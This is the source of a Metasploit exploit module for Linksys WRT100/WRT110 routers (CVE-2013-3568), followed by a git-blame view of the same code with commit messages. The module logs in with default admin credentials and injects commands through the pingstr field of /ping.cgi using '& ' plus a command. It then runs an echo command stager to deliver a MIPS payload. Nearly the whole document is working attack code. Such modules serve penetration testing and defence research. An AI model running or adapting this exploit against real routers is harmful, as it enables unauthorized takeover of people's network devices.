modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Linksys Devices pingstr Remote Command Injection',
      'Description' => %q{
        The Linksys WRT100 and WRT110 consumer routers are vulnerable to a command
        injection exploit in the ping field of the web interface.
      },
      'Author'      =>
        [
          'Craig Young', # Vulnerability discovery
          'joev', # msf module
          'juan vazquez' # module help + echo cmd stager
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2013-3568'],
          ['BID', '61151'],
          ['URL', 'https://seclists.org/bugtraq/2013/Jul/78']
        ],
      'DisclosureDate' => 'Jul 12 2013',
      'Privileged'     => true,
      'Platform'       => ['linux'],
      'Arch'           => ARCH_MIPSLE,
      'Targets'        =>
        [
            ['Linux mipsel Payload', { } ]
        ],
      'DefaultTarget'  => 0,
      ))

    register_options([
      OptString.new('HttpUsername', [ true, 'Valid router administrator username', 'admin']),
      OptString.new('HttpPassword', [ true, 'Password to login with', 'admin']),
      OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
      OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
    ])
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  def check
    begin
      res = send_request_cgi({
        'uri' => '/HNAP1/'
      })
    rescue ::Rex::ConnectionError
      vprint_error("A connection error has occurred")
      return Exploit::CheckCode::Unknown
    end

    if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    test_login

    execute_cmdstager({:flavor => :echo})
  end

  # Sends an HTTP request with authorization header to the router
  # Raises an exception unless the login is successful
  def test_login
    print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")

    res = send_auth_request_cgi({
      'uri' => '/',
      'method' => 'GET'
    })

    if not res or res.code == 401 or res.code == 404
      fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
    else
      print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
    end
  end

  # Run the command on the router
  def execute_command(cmd, opts)
    send_auth_request_cgi({
      'uri' => '/ping.cgi',
      'method' => 'POST',
      'vars_post' => {
         'pingstr' => '& ' + cmd
      }
    })

    Rex.sleep(1) # Give the device a second
  end

  # Helper methods
  def user
    datastore['HttpUsername']
  end

  def pass
    datastore['HttpPassword'] || ''
  end

  def send_auth_request_cgi(opts={}, timeout=nil)
    timeout ||= datastore['TIMEOUT']
    opts.merge!('authorization' => basic_auth(user, pass))
    begin
      send_request_cgi(opts, timeout)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
    end
  end
end
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`
Use One CMDStagermixin 2014-02-07 18:46:19 -06:00			`include Msf::Exploit::CmdStager`
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00
			`def initialize(info = {})`
			`super(update_info(info,`
Modify title to avoid versions 2014-01-07 13:01:10 -06:00			`'Name' => 'Linksys Devices pingstr Remote Command Injection',`
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00			`'Description' => %q{`
Add wrt100 to the description and title. 2014-01-07 10:26:15 -06:00			`The Linksys WRT100 and WRT110 consumer routers are vulnerable to a command`
			`injection exploit in the ping field of the web interface.`
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00			`},`
			`'Author' =>`
			`[`
			`'Craig Young', # Vulnerability discovery`
Put my short name to prevent conflicts. 2013-10-07 14:10:47 -05:00			`'joev', # msf module`
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00			`'juan vazquez' # module help + echo cmd stager`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`['CVE', '2013-3568'],`
			`['BID', '61151'],`
Fix http://seclists.org links to https:// 2018-09-15 18:54:45 -05:00			`['URL', 'https://seclists.org/bugtraq/2013/Jul/78']`
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00			`],`
			`'DisclosureDate' => 'Jul 12 2013',`
			`'Privileged' => true,`
			`'Platform' => ['linux'],`
			`'Arch' => ARCH_MIPSLE,`
			`'Targets' =>`
			`[`
			`['Linux mipsel Payload', { } ]`
			`],`
			`'DefaultTarget' => 0,`
			`))`

			`register_options([`
Correct false negative post_auth? status 2018-08-09 23:34:03 -05:00			`OptString.new('HttpUsername', [ true, 'Valid router administrator username', 'admin']),`
			`OptString.new('HttpPassword', [ true, 'Password to login with', 'admin']),`
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00			`OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),`
			`OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Explicitly use the echo stager and deregister options 2014-06-28 16:21:08 -04:00			`deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')`
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00			`end`

			`def check`
			`begin`
			`res = send_request_cgi({`
			`'uri' => '/HNAP1/'`
			`})`
			`rescue ::Rex::ConnectionError`
Fix various typos 2017-07-21 07:40:08 -07:00			`vprint_error("A connection error has occurred")`
Progress 2014-01-22 11:20:10 -06:00			`return Exploit::CheckCode::Unknown`
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00			`end`

			`if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/`
Update some checks 2014-01-24 12:08:23 -06:00			`return Exploit::CheckCode::Appears`
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00			`end`

			`return Exploit::CheckCode::Safe`
			`end`

			`def exploit`
Release time fixes to modules 2013-10-14 15:17:39 -05:00			`test_login`
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00
Initial attempt to unify the command stagers. 2013-10-07 17:31:34 -04:00			`execute_cmdstager({:flavor => :echo})`
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00			`end`

			`# Sends an HTTP request with authorization header to the router`
			`# Raises an exception unless the login is successful`
Release time fixes to modules 2013-10-14 15:17:39 -05:00			`def test_login`
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00			`print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")`

			`res = send_auth_request_cgi({`
			`'uri' => '/',`
			`'method' => 'GET'`
			`})`

			`if not res or res.code == 401 or res.code == 404`
			`fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")`
			`else`
			`print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")`
			`end`
			`end`

			`# Run the command on the router`
			`def execute_command(cmd, opts)`
			`send_auth_request_cgi({`
			`'uri' => '/ping.cgi',`
			`'method' => 'POST',`
			`'vars_post' => {`
			`'pingstr' => '& ' + cmd`
			`}`
			`})`

			`Rex.sleep(1) # Give the device a second`
			`end`

			`# Helper methods`
code style 2014-12-11 23:30:20 +01:00			`def user`
Missed the HTTPUSERNAME fix 2016-05-27 18:37:04 -05:00			`datastore['HttpUsername']`
code style 2014-12-11 23:30:20 +01:00			`end`

			`def pass`
Correct casing - should be HttpUsername and HttpPassword 2016-05-27 18:31:54 -05:00			`datastore['HttpPassword'] \|\| ''`
code style 2014-12-11 23:30:20 +01:00			`end`
Deprecate misnamed module. 2013-10-07 14:06:13 -05:00
			`def send_auth_request_cgi(opts={}, timeout=nil)`
			`timeout \|\|= datastore['TIMEOUT']`
			`opts.merge!('authorization' => basic_auth(user, pass))`
			`begin`
			`send_request_cgi(opts, timeout)`
			`rescue ::Rex::ConnectionError`
			`fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")`
			`end`
			`end`
			`end`